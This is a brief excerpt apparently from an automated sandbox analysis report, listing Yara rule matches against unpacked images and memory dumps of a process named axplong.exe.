Source: Yara match File source: 6.2.axplong.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.axplong.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.1403500499.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1963827399.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1378088248.0000000005200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1418313558.0000000000011000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1443822866.0000000000401000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY